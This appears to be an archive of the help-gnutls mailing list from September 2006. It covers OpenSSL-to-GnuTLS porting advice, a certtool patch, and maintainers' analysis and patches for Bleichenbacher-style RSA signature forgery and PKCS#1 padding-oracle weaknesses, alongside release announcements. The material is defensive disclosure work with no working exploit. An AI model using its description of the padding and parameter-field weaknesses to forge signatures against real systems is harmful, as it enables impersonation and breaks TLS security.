From evilynux at gmail.com Sat Sep 2 06:23:18 2006 From: evilynux at gmail.com (Pascal) Date: Sat, 2 Sep 2006 00:23:18 -0400 Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS Message-ID: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> Hi, as the Debian packager of mail-notification?, i'm looking into the possibility of patching this application to use GnuTLS instead of OpenSSL. I've reached a dead end trying to negociate with the upstream author long time ago?. Users (both Debian? and Ubuntu?) are still asking for SSL/TLS support (and I understand) so i decided to have a look and see if i could take action on this. So i'm kindly asking for links to existing docs or tips for this kind of process. Any other relevant help is welcome. Thanks, -Pascal ? http://www.nongnu.org/mailnotify/ ? http://bugs.debian.org/286672 ? https://launchpad.net/distros/ubuntu/+source/mail-notification/+bug/44335 -- Homepage (http://organact.mine.nu) Debian GNU/Linux (http://www.debian.org) From daniel at haxx.se Sat Sep 2 12:59:55 2006 From: daniel at haxx.se (Daniel Stenberg) Date: Sat, 2 Sep 2006 12:59:55 +0200 (CEST) Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS In-Reply-To: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> Message-ID: On Sat, 2 Sep 2006, Pascal wrote: > I've reached a dead end trying to negociate with the upstream author long > time ago?. Users (both Debian? and Ubuntu?) are still asking for SSL/TLS > support (and I understand) so i decided to have a look and see if i could > take action on this. > > So i'm kindly asking for links to existing docs or tips for this kind of > process. Any other relevant help is welcome. I'm not sure it helps, but if it is client-side SSL you need I've written support for both OpenSSL and GnuTLS in libcurl and they are interchangable (at build-time) so perhaps that could work as an example to look at? -- -=- Daniel Stenberg -=- http://daniel.haxx.se -=- ech`echo xiun|tr nu oc|sed 'sx\([s\x]\)\([\xoi]\)xo un\2\1 is xg'`ol From evilynux at gmail.com Sat Sep 2 16:28:56 2006 From: evilynux at gmail.com (Pascal) Date: Sat, 2 Sep 2006 10:28:56 -0400 Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS In-Reply-To: References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> Message-ID: <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com> On 9/2/06, Daniel Stenberg wrote: > I'm not sure it helps, but if it is client-side SSL you need I've written > support for both OpenSSL and GnuTLS in libcurl and they are interchangable (at > build-time) so perhaps that could work as an example to look at? Hi Daniel, indeed, it's client-side, i'll have a look. I guess i should start by comparing lib/gtls.{h,c} and lib/ssl*.{h,c} ? -Pascal -- Homepage (http://organact.mine.nu) Debian GNU/Linux (http://www.debian.org) From daniel at haxx.se Sat Sep 2 21:27:32 2006 From: daniel at haxx.se (Daniel Stenberg) Date: Sat, 2 Sep 2006 21:27:32 +0200 (CEST) Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS In-Reply-To: <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com> References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com> Message-ID: On Sat, 2 Sep 2006, Pascal wrote: > indeed, it's client-side, i'll have a look. I guess i should start by > comparing lib/gtls.{h,c} and lib/ssl*.{h,c} ? Yeps, within libcurl we have a generic SSL/TLS layer which is in sslgen.[ch] and only from there it picks specific OpenSSL (ssluse.[ch]) or GnuTLS (gtls.[ch]) functions. It isn't 100% covering, but the concept works pretty good. -- -=- Daniel Stenberg -=- http://daniel.haxx.se -=- ech`echo xiun|tr nu oc|sed 'sx\([s\x]\)\([\xoi]\)xo un\2\1 is xg'`ol From bradh at frogmouth.net Sun Sep 3 00:50:59 2006 From: bradh at frogmouth.net (Brad Hards) Date: Sun, 3 Sep 2006 08:50:59 +1000 Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS In-Reply-To: <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com> References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com> Message-ID: <200609030851.05070.bradh@frogmouth.net> On Sunday 03 September 2006 00:28, Pascal wrote: > On 9/2/06, Daniel Stenberg wrote: > > I'm not sure it helps, but if it is client-side SSL you need I've written > > support for both OpenSSL and GnuTLS in libcurl and they are > > interchangable (at build-time) so perhaps that could work as an example > > to look at? > > Hi Daniel, > indeed, it's client-side, i'll have a look. > I guess i should start by comparing lib/gtls.{h,c} and lib/ssl*.{h,c} ? I would start by looking at the compatibility library. See: http://www.gnu.org/software/gnutls/manual/html_node/Compatibility-with-the-OpenSSL-library.html Brad -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available URL: From evilynux at gmail.com Sun Sep 3 01:54:53 2006 From: evilynux at gmail.com (Pascal) Date: Sat, 2 Sep 2006 19:54:53 -0400 Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS In-Reply-To: <200609030851.05070.bradh@frogmouth.net> References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com> <200609030851.05070.bradh@frogmouth.net> Message-ID: <6ffb82fd0609021654q3bd3e6afv98f7dca8e050a65a@mail.gmail.com> Thanks Brad, but the error handling is not thread safe which, IMHO, makes it unsuitable for Debian. -Pascal On 9/2/06, Brad Hards wrote: > On Sunday 03 September 2006 00:28, Pascal wrote: > > On 9/2/06, Daniel Stenberg wrote: > > > I'm not sure it helps, but if it is client-side SSL you need I've written > > > support for both OpenSSL and GnuTLS in libcurl and they are > > > interchangable (at build-time) so perhaps that could work as an example > > > to look at? > > > > Hi Daniel, > > indeed, it's client-side, i'll have a look. > > I guess i should start by comparing lib/gtls.{h,c} and lib/ssl*.{h,c} ? > I would start by looking at the compatibility library. See: > http://www.gnu.org/software/gnutls/manual/html_node/Compatibility-with-the-OpenSSL-library.html > > Brad > > > -- Homepage (http://organact.mine.nu) Debian GNU/Linux (http://www.debian.org) From bradh at frogmouth.net Sun Sep 3 02:19:29 2006 From: bradh at frogmouth.net (Brad Hards) Date: Sun, 3 Sep 2006 10:19:29 +1000 Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS In-Reply-To: <6ffb82fd0609021654q3bd3e6afv98f7dca8e050a65a@mail.gmail.com> References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <200609030851.05070.bradh@frogmouth.net> <6ffb82fd0609021654q3bd3e6afv98f7dca8e050a65a@mail.gmail.com> Message-ID: <200609031019.34329.bradh@frogmouth.net> On Sunday 03 September 2006 09:54, Pascal wrote: > Thanks Brad, > but the error handling is not thread safe which, IMHO, makes it > unsuitable for Debian. Is MailNotifier actually threaded? I had a quick look at the code, and it didn't seem to be so. BTW: I'm not sure why a some aspect of a particular library not being thread safe (which is very common) would exclude it from Debian. You just have to be careful with the way in which you use it (e.g. most of Qt is not thread safe - you just have to make sure you only do certain operations from the GUI thread). Brad -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available URL: From sascha.ziemann at secunet.com Mon Sep 4 13:22:59 2006 From: sascha.ziemann at secunet.com (Sascha Ziemann) Date: Mon, 04 Sep 2006 13:22:59 +0200 Subject: [Help-gnutls] Two organizational units Message-ID: <44FC0C93.8080505@secunet.com> Hi, I would like to generate a certificate with more than one OU field in the subject. When I try to write two "unit=" entries in the template file, I get an error. What is the right way to do that? Regards, Ziemann From jas at extundo.com Mon Sep 4 16:09:42 2006 From: jas at extundo.com (Simon Josefsson) Date: Mon, 04 Sep 2006 16:09:42 +0200 Subject: [Help-gnutls] Re: Two organizational units In-Reply-To: <44FC0C93.8080505@secunet.com> (Sascha Ziemann's message of "Mon, 04 Sep 2006 13:22:59 +0200") References: <44FC0C93.8080505@secunet.com> Message-ID: <87y7szwwnt.fsf@latte.josefsson.org> Sascha Ziemann writes: > Hi, > > I would like to generate a certificate with more than one OU field in > the subject. When I try to write two "unit=" entries in the template > file, I get an error. What is the right way to do that? Hi! I don't think that is supported right now. Could you test this patch? /Simon Index: certtool-cfg.c =================================================================== RCS file: /cvs/gnutls/gnutls/src/certtool-cfg.c,v retrieving revision 2.15 diff -u -p -r2.15 certtool-cfg.c --- certtool-cfg.c 15 May 2006 14:29:45 -0000 2.15 +++ certtool-cfg.c 4 Sep 2006 14:07:10 -0000 @@ -40,7 +40,7 @@ extern int batch; typedef struct _cfg_ctx { char *organization; - char *unit; + char **unit; char *locality; char *state; char *cn; @@ -93,7 +93,7 @@ template_parse (const char *template) struct cfg_option options[] = { {NULL, '\0', "organization", CFG_STR, (void *) &cfg.organization, 0}, - {NULL, '\0', "unit", CFG_STR, (void *) &cfg.unit, 0}, + {NULL, '\0', "unit", CFG_STR + CFG_MULTI, (void *) &cfg.unit, 0}, {NULL, '\0', "locality", CFG_STR, (void *) &cfg.locality, 0}, {NULL, '\0', "state", CFG_STR, (void *) &cfg.state, 0}, {NULL, '\0', "cn", CFG_STR, (void *) &cfg.cn, 0}, @@ -366,20 +366,24 @@ void get_unit_crt_set (gnutls_x509_crt crt) { int ret; + size_t i; if (batch) { if (!cfg.unit) return; - ret = - gnutls_x509_crt_set_dn_by_oid (crt, - GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, - 0, cfg.unit, strlen (cfg.unit)); - if (ret < 0) + for (i = 0; cfg.unit[i] != NULL; i++) { - fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); - exit (1); + ret = + gnutls_x509_crt_set_dn_by_oid (crt, + GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, + 0, cfg.unit[i], strlen (cfg.unit[i])); + if (ret < 0) + { + fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); + exit (1); + } } } else @@ -892,20 +896,24 @@ void get_unit_crq_set (gnutls_x509_crq crq) { int ret; + size_t i; if (batch) { if (!cfg.unit) return; - ret = - gnutls_x509_crq_set_dn_by_oid (crq, - GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, - 0, cfg.unit, strlen (cfg.unit)); - if (ret < 0) + for (i = 0; cfg.unit[i] != NULL; i++) { - fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); - exit (1); + ret = + gnutls_x509_crq_set_dn_by_oid (crq, + GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, + 0, cfg.unit[i], strlen (cfg.unit[i])); + if (ret < 0) + { + fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); + exit (1); + } } } else Index: certtool-cfg.h =================================================================== RCS file: /cvs/gnutls/gnutls/src/certtool-cfg.h,v retrieving revision 2.8 diff -u -p -r2.8 certtool-cfg.h --- certtool-cfg.h 7 Nov 2005 23:28:05 -0000 2.8 +++ certtool-cfg.h 4 Sep 2006 14:07:10 -0000 @@ -1,6 +1,6 @@ #include -extern char *organization, *unit, *locality, *state; +extern char *organization, **unit, *locality, *state; extern char *cn, *challenge_password, *password, *pkcs9_email, *country; extern char *dns_name, *email, *crl_dist_points, *pkcs12_key_name; extern int serial, expiration_days, ca, tls_www_client, tls_www_server, From jas at extundo.com Fri Sep 8 12:12:40 2006 From: jas at extundo.com (Simon Josefsson) Date: Fri, 08 Sep 2006 12:12:40 +0200 Subject: [Help-gnutls] Bleichenbacher RSA signature forgery attack and GnuTLS Message-ID: <87lkoupsyv.fsf@latte.josefsson.org> You may have heard about a neat attack by Daniel Bleichenbacher, described in: http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html I went over the GnuTLS code to review if it is vulnerable. Signature verification starts in lib/x509/verify.c:_pkcs1_rsa_verify_sig, which calls lib/gnutls_pk.c:_gnutls_pkcs1_rsa_decrypt. It contains code like this: _gnutls_mpi_print (&edata[1], &esize, res); ... ret = GNUTLS_E_DECRYPTION_FAILED; switch (btype) { case 2: for (i = 2; i < esize; i++) { if (edata[i] == 0) { ret = 0; break; } } break; case 1: for (i = 2; i < esize; i++) { if (edata[i] == 0 && i > 2) { ret = 0; break; } if (edata[i] != 0xff) { _gnutls_handshake_log ("PKCS #1 padding error"); ret = GNUTLS_E_PKCS1_WRONG_PAD; break; } } break; default: gnutls_assert (); gnutls_afree (edata); return GNUTLS_E_INTERNAL_ERROR; } i++; if (ret < 0) { gnutls_assert (); gnutls_afree (edata); return GNUTLS_E_DECRYPTION_FAILED; } if (_gnutls_sset_datum (plaintext, &edata[i], esize - i) < 0) { gnutls_assert (); gnutls_afree (edata); return GNUTLS_E_MEMORY_ERROR; } Thus it will save rest of the blob after the FFFF..FFFF00 sequence in "plaintext". Now back in _pkcs1_rsa_verify_sig, it calls decode_ber_digest_info on "plaintext", which in turns call libtasn1 (plaintext==info): result = asn1_der_decoding (&dinfo, info->data, info->size, NULL); if (result != ASN1_SUCCESS) { gnutls_assert (); asn1_delete_structure (&dinfo); return _gnutls_asn2err (result); } The libtasn1 library checks that the decoded data is of the indicated length, so if "info" contains the correct ASN.1 blob plus some garbage, the entire decoding will fail. See the end of asn1_der_decoding for the check that catches this: if (counter != len) { asn1_delete_structure (element); return ASN1_DER_ERROR; } Here, len is the "plaintext" length, and "counter" is the size of the ASN.1 structure that it computed by parsing the data. The conclusion is that GnuTLS isn't vulnerable to _exactly_ this attack. /Simon From jas at extundo.com Fri Sep 8 15:54:26 2006 From: jas at extundo.com (Simon Josefsson) Date: Fri, 08 Sep 2006 15:54:26 +0200 Subject: [Help-gnutls] Re: Bleichenbacher RSA signature forgery attack and GnuTLS In-Reply-To: <87lkoupsyv.fsf@latte.josefsson.org> (Simon Josefsson's message of "Fri\, 08 Sep 2006 12\:12\:40 +0200") References: <87lkoupsyv.fsf@latte.josefsson.org> Message-ID: <87wt8ewjjh.fsf@latte.josefsson.org> Simon Josefsson writes: > _gnutls_handshake_log ("PKCS #1 padding error"); > ret = GNUTLS_E_PKCS1_WRONG_PAD; Werner Koch points out that this error message may result in a vulnerability similar to Bleichenbacher's Crypto 98 attack. It is not exactly the same situation -- Bleichenbacher talks about PKCS#1 encryption (block type 1, uses random padding) where this deals with PKCS#1 verification (block type 2, uses 0xFF padding) -- but at a glance, it appears to have similar consequences, but differ in the number of messages required to mount the attack. The patch to solve this, which has been installed on GnuTLS 1.4.x and GnuTLS 1.5.x branches, is included below. I'll release 1.4.3 later today. /Simon Index: gnutls_pk.c =================================================================== RCS file: /cvs/gnutls/gnutls/lib/gnutls_pk.c,v retrieving revision 1.82 retrieving revision 1.83 diff -u -p -r1.82 -r1.83 --- gnutls_pk.c 15 Dec 2005 13:24:29 -0000 1.82 +++ gnutls_pk.c 8 Sep 2006 13:19:29 -0000 1.83 @@ -1,5 +1,5 @@ /* - * Copyright (C) 2001, 2002, 2003, 2004, 2005 Free Software Foundation + * Copyright (C) 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation * * Author: Nikos Mavroyanopoulos * @@ -265,8 +265,13 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ _gnutls_mpi_release (&res); - /* EB = 00||BT||PS||00||D + /* EB = 00||BT||PS||00||D * (use block type 'btype') + * + * From now on, return GNUTLS_E_DECRYPTION_FAILED on errors, to + * avoid attacks similar to the one described by Bleichenbacher in: + * "Chosen Ciphertext Attacks against Protocols Based on RSA + * Encryption Standard PKCS #1". */ @@ -303,8 +308,8 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ } if (edata[i] != 0xff) { - _gnutls_handshake_log ("PKCS #1 padding error"); - ret = GNUTLS_E_PKCS1_WRONG_PAD; + /* PKCS #1 padding error. Don't use + GNUTLS_E_PKCS1_WRONG_PAD here. */ break; } } @@ -312,7 +317,6 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ default: gnutls_assert (); gnutls_afree (edata); - return GNUTLS_E_INTERNAL_ERROR; } i++; From jas at extundo.com Fri Sep 8 17:26:01 2006 From: jas at extundo.com (Simon Josefsson) Date: Fri, 08 Sep 2006 17:26:01 +0200 Subject: [Help-gnutls] GnuTLS 1.4.3 Message-ID: <87r6ymv0qe.fsf@latte.josefsson.org> I am happy to announce GnuTLS 1.4.3, a security bugfix release on the stable 1.4 branch. This version is what we recommend for those who need a stable version of GnuTLS. GnuTLS is a modern C library that implement the standard network security protocol Transport Layer Security (TLS), for use by network applications. Noteworthy changes since 1.4.2: ** Fix PKCS#1 verification to avoid a variant of Bleichenbacher's ** Crypto 06 rump session attack. In particular, we check that the digestAlgorithm.parameters field is empty, to avoid that it can contain "garbage" that may be used to alter the numeric properties of the signature. See (which is not exactly the same as the problem we fix here). Reported by Yutaka OIWA . See GNUTLS-SA-2006-4 on http://www.gnutls.org/security.html for more up to date information. ** Fix PKCS#1 decryption to avoid Bleichenbacher's Crypto 98 attack. See . Reported by Werner Koch . See GNUTLS-SA-2006-3 on http://www.gnutls.org/security.html for more up to date information. ** Fix crash in gnutls_x509_crt_sign2 if passed a NULL issuer_key. ** API and ABI modifications: No changes since last version. Improving GnuTLS is costly, but you can help! We are looking for organizations that find GnuTLS useful and wish to contribute back. You can contribute by reporting bugs, improve the software, or donate money or equipment. Commercial support contracts for GnuTLS are available, and they help finance continued maintenance. Simon Josefsson Datakonsult, a Stockholm based privately held company, is currently funding GnuTLS maintenance. We are always looking for interesting development projects. See http://josefsson.org/ for more details. All manual formats are available from: http://www.gnutls.org/manual/ Direct link to the most popular formats: http://www.gnutls.org/manual/gnutls.html - HTML format http://www.gnutls.org/manual/gnutls.pdf - PDF format http://www.gnutls.org/reference/ch01.html - API Reference, GTK-DOC HTML If you need help to use GnuTLS, or want to help others, you are invited to join our help-gnutls mailing list, see: . The project page of the library is available at: http://www.gnutls.org/ http://www.gnu.org/software/gnutls/ http://josefsson.org/gnutls/ Here are the compressed sources (3.9MB): http://josefsson.org/gnutls/releases/gnutls-1.4.3.tar.bz2 Here are GPG detached signatures signed using key 0xB565716F: http://josefsson.org/gnutls/releases/gnutls-1.4.3.tar.bz2.sig The software is cryptographically signed by the author using an OpenPGP key identified by the following information: pub 1280R/B565716F 2002-05-05 [expires: 2007-02-15] uid Simon Josefsson uid Simon Josefsson sub 1280R/4D5D40AE 2002-05-05 [expires: 2007-02-15] sub 1024R/09CC4670 2006-03-18 [expires: 2007-04-22] sub 1024R/AABB1F7B 2006-03-18 [expires: 2007-04-22] sub 1024R/A14C401A 2006-03-18 [expires: 2007-04-22] The key is available from: http://josefsson.org/key.txt dns:b565716f.josefsson.org?TYPE=CERT Here are the SHA-1 and SHA-224 checksums: c4182c3804235d6f3eb2f3e59bb560f22370d4fc gnutls-1.4.3.tar.bz2 b95c5be42a41050328c70a6bee0c5fe0df20274e gnutls-1.4.3.tar.bz2.sig 7cd58744ba1a4628f75f2c9dda2d6af4fcbda28ba155e6afead3035e gnutls-1.4.3.tar.bz2 b84e8452859d3c98575cd5a5a1f6d161dc4c4f63bc7803a4626425ef gnutls-1.4.3.tar.bz2.sig Enjoy, Nikos and Simon -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 419 bytes Desc: not available URL: From jas at extundo.com Fri Sep 8 17:44:13 2006 From: jas at extundo.com (Simon Josefsson) Date: Fri, 08 Sep 2006 17:44:13 +0200 Subject: [Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack Message-ID: <87fyf2uzw2.fsf@latte.josefsson.org> The GNUTLS-SA-2006-4 security problem (fixed in 1.4.3) is a variant of Bleichenbacher's latest attack: http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html The difference is that it uses the digestAlgorithm.parameters field to store "garbage" instead of after the ASN.1 blob. The optional parameters field is not used for MD5/SHA1, but instead of verifying that the field is not present, GnuTLS just ignored it. Therefor, it can be used to store garbage data in. This problem was reported to us by Yutaka Oiwa, Kazukuni Kobara, Hajime Watanabe and hopefully their original report with more background will be available soon. The patch that fixes this is for lib/x509/verify.c, see below. This has been installed on the GnuTLS 1.5 branch, but I don't intend to release 1.5.1 soon. Try the nightly snapshots, or 1.4.3 instead. /Simon Update of /cvs/gnutls/gnutls/lib/x509 In directory trithemius:/tmp/cvs-serv3577 Modified Files: Tag: gnutls_1_4_x verify.c Log Message: Make sure the digestAlgorithm.parameters field is empty, which it has to be for the hashes we support. Otherwise, the field can encode "garbage" that might be used to make the signature be a perfect cube, similar (but not identical) to Bleichenbacher's Crypto 06 rump session attack. --- /cvs/gnutls/gnutls/lib/x509/verify.c 2005/11/07 23:28:02 1.52 +++ /cvs/gnutls/gnutls/lib/x509/verify.c 2006/09/08 13:38:55 1.52.2.1 -1,5 +1,5 /* - * Copyright (C) 2003, 2004, 2005 Free Software Foundation + * Copyright (C) 2003, 2004, 2005, 2006 Free Software Foundation * * Author: Nikos Mavroyanopoulos * -505,6 +505,15 return GNUTLS_E_UNKNOWN_HASH_ALGORITHM; } + len = sizeof (str) - 1; + result = asn1_read_value (dinfo, "digestAlgorithm.parameters", NULL, &len); + if (result != ASN1_ELEMENT_NOT_FOUND) + { + gnutls_assert (); + asn1_delete_structure (&dinfo); + return _gnutls_asn2err (result); + } + result = asn1_read_value (dinfo, "digest", digest, digest_size); if (result != ASN1_SUCCESS) { From jas at extundo.com Mon Sep 11 15:14:48 2006 From: jas at extundo.com (Simon Josefsson) Date: Mon, 11 Sep 2006 15:14:48 +0200 Subject: [Help-gnutls] Re: Bleichenbacher RSA signature forgery attack and GnuTLS In-Reply-To: <87wt8ewjjh.fsf@latte.josefsson.org> (Simon Josefsson's message of "Fri\, 08 Sep 2006 15\:54\:26 +0200") References: <87lkoupsyv.fsf@latte.josefsson.org> <87wt8ewjjh.fsf@latte.josefsson.org> Message-ID: <87k64av92v.fsf@latte.josefsson.org> Simon Josefsson writes: > Simon Josefsson writes: > >> _gnutls_handshake_log ("PKCS #1 padding error"); >> ret = GNUTLS_E_PKCS1_WRONG_PAD; > > Werner Koch points out that this error message may result in a > vulnerability similar to Bleichenbacher's Crypto 98 attack. It is not > exactly the same situation -- Bleichenbacher talks about PKCS#1 > encryption (block type 1, uses random padding) where this deals with > PKCS#1 verification (block type 2, uses 0xFF padding) -- but at a > glance, it appears to have similar consequences, but differ in the > number of messages required to mount the attack. Nikos points out that we have already protected against that attack, for TLS sessions, in auth_rsa.c: ret = _gnutls_pkcs1_rsa_decrypt (&plaintext, &ciphertext, params, params_len, 2); /* btype==2 */ if (ret < 0 || plaintext.size != TLS_MASTER_SIZE) { /* In case decryption fails then don't inform * the peer. Just use a random key. (in order to avoid * attack against pkcs-1 formating). */ gnutls_assert (); _gnutls_x509_log ("auth_rsa: Possible PKCS #1 format attack\n"); randomize_key = 1; } else { /* If the secret was properly formatted, then * check the version number. */ if (_gnutls_get_adv_version_major (session) != plaintext.data[0] || _gnutls_get_adv_version_minor (session) != plaintext.data[1]) { /* No error is returned here, if the version number check * fails. We proceed normally. * That is to defend against the attack described in the paper * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima, * Ondej Pokorny and Tomas Rosa. */ gnutls_assert (); _gnutls_x509_log ("auth_rsa: Possible PKCS #1 version check format attack\n"); } } The GNUTLS-SA-2006-3 security advisory thus was a false alarm, but I'm keeping the information on: http://www.gnu.org/software/gnutls/security.html I'll add a link to this post, though. There should be no harm in applying the patch, though. Note 1: If someone is worried about the log file being used as the oracle here, don't be: the above log statements are only executed if in debug mode, and this isn't recommended nor typical behaviour. Note 2: I'd be interested in if someone could establish whether it is possible to extend this oracle attack from error codes to different timings. In other words, if it takes different amount of time to verify a signature depending on the padding error. /Simon > > /Simon > > Index: gnutls_pk.c > =================================================================== > RCS file: /cvs/gnutls/gnutls/lib/gnutls_pk.c,v > retrieving revision 1.82 > retrieving revision 1.83 > diff -u -p -r1.82 -r1.83 > --- gnutls_pk.c 15 Dec 2005 13:24:29 -0000 1.82 > +++ gnutls_pk.c 8 Sep 2006 13:19:29 -0000 1.83 > @@ -1,5 +1,5 @@ > /* > - * Copyright (C) 2001, 2002, 2003, 2004, 2005 Free Software Foundation > + * Copyright (C) 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation > * > * Author: Nikos Mavroyanopoulos > * > @@ -265,8 +265,13 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ > > _gnutls_mpi_release (&res); > > - /* EB = 00||BT||PS||00||D > + /* EB = 00||BT||PS||00||D > * (use block type 'btype') > + * > + * From now on, return GNUTLS_E_DECRYPTION_FAILED on errors, to > + * avoid attacks similar to the one described by Bleichenbacher in: > + * "Chosen Ciphertext Attacks against Protocols Based on RSA > + * Encryption Standard PKCS #1". > */ > > > @@ -303,8 +308,8 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ > } > if (edata[i] != 0xff) > { > - _gnutls_handshake_log ("PKCS #1 padding error"); > - ret = GNUTLS_E_PKCS1_WRONG_PAD; > + /* PKCS #1 padding error. Don't use > + GNUTLS_E_PKCS1_WRONG_PAD here. */ > break; > } > } > @@ -312,7 +317,6 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ > default: > gnutls_assert (); > gnutls_afree (edata); > - return GNUTLS_E_INTERNAL_ERROR; > } > i++; From jas at extundo.com Tue Sep 12 16:35:42 2006 From: jas at extundo.com (Simon Josefsson) Date: Tue, 12 Sep 2006 16:35:42 +0200 Subject: [Help-gnutls] GnuTLS 1.4.4 Message-ID: <87zmd5b1a9.fsf@latte.josefsson.org> I am happy to announce GnuTLS 1.4.4, a bugfix release on the stable 1.4 branch. This version is what we recommend for those who need a stable version of GnuTLS. GnuTLS is a modern C library that implement the standard network security protocol Transport Layer Security (TLS), for use by network applications. Noteworthy changes since 1.4.3: ** Relax the test that caught signatures that exploit the variant of ** Bleichenbacher's Crypto 06 rump session attack on our ** verification logic flaw. In particular, we now permit the digestAlgorithm.parameters field to be present but empty, whereas in 1.4.3 we actually checked that the field was absent. ** Revert the removal of debug information for the GNUTLS-SA-2006-3 problem. The messages are only printed in debug mode, which is not recommended for normal use, and thus logging this situation cannot be abused as an oracle in typical recommended situations. Note that this release does not contain any security fixes compared to 1.4.3, however, it does fix a crash that was introduced by 1.4.3, and it also fixes false negatives when verifying certificates. Thus, users are strongly encouraged to upgrade to this version. Improving GnuTLS is costly, but you can help! We are looking for organizations that find GnuTLS useful and wish to contribute back. You can contribute by reporting bugs, improve the software, or donate money or equipment. Commercial support contracts for GnuTLS are available, and they help finance continued maintenance. Simon Josefsson Datakonsult, a Stockholm based privately held company, is currently funding GnuTLS maintenance. We are always looking for interesting development projects. See http://josefsson.org/ for more details. All manual formats are available from: http://www.gnutls.org/manual/ Direct link to the most popular formats: http://www.gnutls.org/manual/gnutls.html - HTML format http://www.gnutls.org/manual/gnutls.pdf - PDF format http://www.gnutls.org/reference/ch01.html - API Reference, GTK-DOC HTML If you need help to use GnuTLS, or want to help others, you are invited to join our help-gnutls mailing list, see: . The project page of the library is available at: http://www.gnutls.org/ http://www.gnu.org/software/gnutls/ http://josefsson.org/gnutls/ Here are the compressed sources (3.9MB): http://josefsson.org/gnutls/releases/gnutls-1.4.4.tar.bz2 Here are GPG detached signatures signed using key 0xB565716F: http://josefsson.org/gnutls/releases/gnutls-1.4.4.tar.bz2.sig The software is cryptographically signed by the author using an OpenPGP key identified by the following information: pub 1280R/B565716F 2002-05-05 [expires: 2007-02-15] uid Simon Josefsson uid Simon Josefsson sub 1280R/4D5D40AE 2002-05-05 [expires: 2007-02-15] sub 1024R/09CC4670 2006-03-18 [expires: 2007-04-22] sub 1024R/AABB1F7B 2006-03-18 [expires: 2007-04-22] sub 1024R/A14C401A 2006-03-18 [expires: 2007-04-22] The key is available from: http://josefsson.org/key.txt dns:b565716f.josefsson.org?TYPE=CERT Here are the SHA-1 and SHA-224 checksums: 8f6ee112c8d93dd726e8e3d0e3fbf234f085a2cd gnutls-1.4.4.tar.bz2 a72377bccf8d49421f7f5f4e0ff85b489ef4d8d1 gnutls-1.4.4.tar.bz2.sig a357b06cecc3ed5b79d98a26c08bc0b4137aa90bb6453e10a5845681 gnutls-1.4.4.tar.bz2 9aad60797aa994fbac8fd0b8ec6127acfa0c01a75680a6520dc28fc1 gnutls-1.4.4.tar.bz2.sig Enjoy, Nikos and Simon -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 419 bytes Desc: not available URL: From jas at extundo.com Thu Sep 21 16:37:43 2006 From: jas at extundo.com (Simon Josefsson) Date: Thu, 21 Sep 2006 16:37:43 +0200 Subject: [Help-gnutls] GnuTLS 1.5.1 - experimental Message-ID: <87y7sd4760.fsf@latte.josefsson.org> I am happy to announce GnuTLS 1.5.1, the second release on our current development branch. We still recommend the 1.4.x branch as the stable version. One goal with the 1.5.x branch is to make Windows x86 a supported platform for GnuTLS. We do this by providing a binary Windows installer of GnuTLS, cross-compiled from GNU/Linux using MinGW and NSIS. The installer is (lightly) tested on Windows 2000 and Windows XP. It is possible to develop applications in Visual Studio or MinGW that links to the library. See a separate announcement for the binary installer for this release. And yes, the patches for the security problem fixed by 1.4.4 are included in this release too. GnuTLS is a modern C library that implement the standard network security protocol Transport Layer Security (TLS), for use by network applications. * Version 1.5.1 (released 2006-09-21) ** Fix PKCS#1 verification to avoid a variant of Bleichenbacher's ** Crypto 06 rump session attack. In particular, we check that the digestAlgorithm.parameters field is missing or empty, to avoid that it can contain "garbage" that may be used to alter the numeric properties of the signature. See (which is not exactly the same as the problem we fix here). Reported by Yutaka OIWA . See GNUTLS-SA-2006-4 on http://www.gnutls.org/security.html for more up to date information. ** Add self test to test for above flaw. ** 